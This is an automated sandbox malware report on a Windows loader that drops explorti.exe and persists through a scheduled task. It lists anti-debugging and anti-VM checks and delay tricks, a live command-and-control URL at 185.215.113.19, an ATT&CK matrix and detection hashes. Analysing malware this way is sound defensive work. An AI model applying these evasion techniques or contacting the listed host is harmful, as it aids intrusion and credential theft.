                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D09FA second address: 56D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0A4C second address: 56D0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0A52 second address: 56D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0A56 second address: 56D0A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3408102FAh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0A6B second address: 56D0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF34080AB11h 0x00000009 add ecx, 5D1B2BA6h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FF34080AB0Ah 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0AB0 second address: 56D0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56D0AB4 second address: 56D0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0C9C second address: 56E0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f push eax 0x00000010 jmp 00007FF3408102FBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF340810306h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ecx, 607BC2CDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF340810308h 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0D07 second address: 56E0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E0D38 second address: 56E0D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E09BE second address: 56E09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: 56E09C3 second address: 56E09F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF340810307h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSpecial instruction interceptor: First address: D9EAC1 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSpecial instruction interceptor: First address: F4CDBA instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSpecial instruction interceptor: First address: F759FE instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 6FEAC1 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 8ACDBA instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 8D59FE instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeCode function: 0_2_05750D23 rdtsc 0_2_05750D23
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 1239Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 430Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 1294Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 1276Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7804Thread sleep time: -50025s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780Thread sleep count: 1239 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780Thread sleep time: -2479239s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760Thread sleep count: 430 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760Thread sleep time: -12900000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7880Thread sleep time: -540000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776Thread sleep count: 1294 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776Thread sleep time: -2589294s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788Thread sleep count: 1276 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788Thread sleep time: -2553276s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                  Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU+vE
                  Source: 11NdzR12PS.exe, 00000000.00000002.1706850524.0000000000F29000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1730187640.0000000000889000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeCode function: 0_2_05750D23 rdtsc 0_2_05750D23
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006C645B mov eax, dword ptr fs:[00000030h]5_2_006C645B
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006CA1C2 mov eax, dword ptr fs:[00000030h]5_2_006CA1C2
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                  Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006AD312 cpuid 5_2_006AD312
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006ACB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_006ACB1A

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.2.explorti.exe.690000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.explorti.exe.690000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.11NdzR12PS.exe.d30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000003.2279106197.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1665922474.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1689349106.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1730077217.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1706599443.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter
                  1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  251
                  Virtualization/Sandbox Evasion
                  LSASS Memory741
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  12
                  Process Injection
                  Security Account Manager2
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information
                  NTDS251
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture11
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  11NdzR12PS.exe53%VirustotalBrowse
                  11NdzR12PS.exe100%AviraTR/Crypt.TPM.Gen
                  11NdzR12PS.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe53%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://185.215.113.19/Vi9leo/index.phpeb8a7100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.php100%Avira URL Cloudmalware
                  http://185.215.113.19/Vi9leo/index.phpC:100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.php6100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.php4100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phpm32100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phpWindows100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.php618%VirustotalBrowse
                  http://185.215.113.19/Vi9leo/index.phpsM100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phpon100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.php?100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phpm323%VirustotalBrowse
                  http://185.215.113.19/Vi9leo/index.php2%VirustotalBrowse
                  http://185.215.113.19/Vi9leo/index.phpH100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phpon18%VirustotalBrowse
                  http://185.215.113.19/Vi9leo/index.phpoft100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phprosoft100%Avira URL Cloudphishing
                  http://185.215.113.19/Vi9leo/index.phpH3%VirustotalBrowse
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.19/Vi9leo/index.phptrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.19/Vi9leo/index.php4explorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpC:explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.php6explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpeb8a7explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpWindowsexplorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpm32explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpsMexplorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phponexplorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.php?explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpHexplorti.exe, 00000005.00000002.2903017790.0000000000FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phpoftexplorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  http://185.215.113.19/Vi9leo/index.phprosoftexplorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.19
                  unknownPortugal
                  206894WHOLESALECONNECTIONSNLtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483371
                  Start date and time:2024-07-27 04:48:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:11NdzR12PS.exe
                  renamed because original name is a hash value
                  Original Sample Name:291a8d56e77cb07be1a6b4308d51650b.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target 11NdzR12PS.exe, PID 6740 because it is empty
                  • Execution Graph export aborted for target explorti.exe, PID 5744 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  03:49:01Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  22:50:02API Interceptor86457x Sleep call for process: explorti.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.19file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  LbMTyCFRzs.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.19/Vi9leo/index.php
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, RedLine, Stealc, VidarBrowse
                  • 185.215.113.16
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  setup.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
                  • 185.215.113.16
                  setup.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.19
                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                  • 185.215.113.16
                  No context
                  No context
                  Process:C:\Users\user\Desktop\11NdzR12PS.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1921536
                  Entropy (8bit):7.955496476230148
                  Encrypted:false
                  SSDEEP:49152:N4T6hIyXZjUqy6rCPkriwTB3/4z/vVaHAZT:+T6hI9DQi64z/vs
                  MD5:291A8D56E77CB07BE1A6B4308D51650B
                  SHA1:310E47B223740DE2989F5C8F4B12D294E6568A2C
                  SHA-256:FDA0FC105FFD6FAAE12D08C243FE684BE8C69696BD654D733F5CAF487B59BAAE
                  SHA-512:7F764A84720DDD1B2792747797BEFB2272EB33DC4CE141C78BEF87356E7C861451588678E2A041084DB3B96A8A23B191D864F93E66F8FFEFE368FBB494F0165D
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 53%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f............................. L...........@..........................PL.....w.....@.................................W...k...........................`.L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...wokugkrf.@....1..8..................@...csqdmnjl......L......*..............@....taggant.0... L.."...0..............@...........................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\11NdzR12PS.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\11NdzR12PS.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):288
                  Entropy (8bit):3.3693605559613005
                  Encrypted:false
                  SSDEEP:6:r4jVX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0l1Xft0:kt4RKQ1cag7jzvYRQV1Pt0
                  MD5:D2A5572BA2CD14B640C772350C2F3B4E
                  SHA1:E5197A742B323C15E67EA7D615580F93CA3D2E0D
                  SHA-256:47619FCB3E0BEBAE3ACD096EC057804B25847245E64FA029AEE74E9C976B8748
